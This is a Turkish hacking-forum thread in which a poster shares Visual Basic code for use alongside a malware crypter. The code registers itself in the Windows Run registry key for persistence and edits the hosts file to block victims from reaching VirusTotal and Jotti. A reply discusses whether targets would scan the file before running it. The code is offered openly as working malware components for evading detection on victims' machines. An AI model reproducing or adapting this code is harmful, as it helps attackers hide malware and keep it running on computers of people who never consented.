crypter patlamaya son

10 Şub 2015
92
3
biliyorum herkes crypteri patlıyor diye korkuyor şimdi bende kendi crypterime eklediğin bir takım kodlar var ben dll olarak ekledim şuanlık forumda deneme aşamasına aldım ve kullanıyorum özelliği kendini startup olarak atıyor ve virus total ve jottiyi engelliyor kendini ototmatik başlangıça attığı için kullanıcı kaldırsa bile başlangıçta tekrar engelliyor
not: program yönetici olarak çalıştırılmalıdır


3LOZ0r.png



Kod:
Private Sub Form_Load()
Dim Startup_key As String

Startup_key = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\"

Dim Reg As Object

Set Reg = CreateObject("wscript.shell")

Reg.RegWrite Startup_key & App.EXEName, App.Path & "\" & App.EXEName & ".exe"

Dim dizin As String
Dim yerayır As String
Dim site As String
Dim site2 As String
dizin = Environ("windir") & "\system32\drivers\etc\hosts"
Open dizin For Binary As 1
yerayır = Space(FileLen(dizin))
Get 1, , yerayır
Close 1
site = vbNewLine & "127.0.0.1 www.virustotal.com "
site2 = vbNewLine & "127.0.0.1 www.jooti.com "
Open dizin For Binary As 1
Put 1, , yerayır & site
Close 1
End Sub

Öncelikle teşekkürler emeğinin karsılıgını verelim fakat dostum ufakdan bir gözden geçirdim sosyal mühendisliğe dayanarak adam bunu ilk önce vt veya jt atacak yani crypter patlayacak sonra açacak bak dikkatını çekeyim ilk önce açarsa zaten virustotale ve virüs jottiye atma gereğide kalmayacak. bence bu vt ve jt işini crypter üzerinden halletmek lazım eğer bir fikir istiyorsan iyi forumlar
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.